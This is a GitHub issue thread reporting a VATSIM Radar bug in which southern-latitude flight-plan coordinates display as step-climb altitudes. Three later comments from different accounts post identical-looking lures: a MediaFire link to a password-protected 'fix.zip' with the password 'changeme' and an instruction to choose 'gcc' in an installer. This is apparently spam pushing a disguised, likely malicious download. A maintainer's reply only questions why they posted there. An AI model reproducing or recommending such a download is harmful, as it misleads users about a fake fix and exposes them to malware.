### ISSUE TITLE
Step Climb - Coordinates south of equator displayed as step climbs

### ISSUE THREAD

**Issue by m-9c** [VATSIM-Radar/vatsim-radar#300]
### Your Vatsim CID

974571

### Radar version

v0.4.4-beta.1

### Describe your issue

![image](https://github.com/user-attachments/assets/0f4f6576-000b-4651-999e-af7b7b782705)

### Reproduction steps

Have a flight plan with a coordinate with a southern latitude. The latitude will then be displayed as a step climb altitude.

### Platform

Chrome, Windows

### Validation

- [X] I have searched for other issues and didn't found any alike
- [X] I have also checked roadmap, and this is not planned
- [X] I am QA or Patreon member and using next.vatsim-radar.com
- [X] I couldn't reproduce it on production / it's issue in new functionality

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by daniluk4000** [comment]
Why do they choose this one to comment?
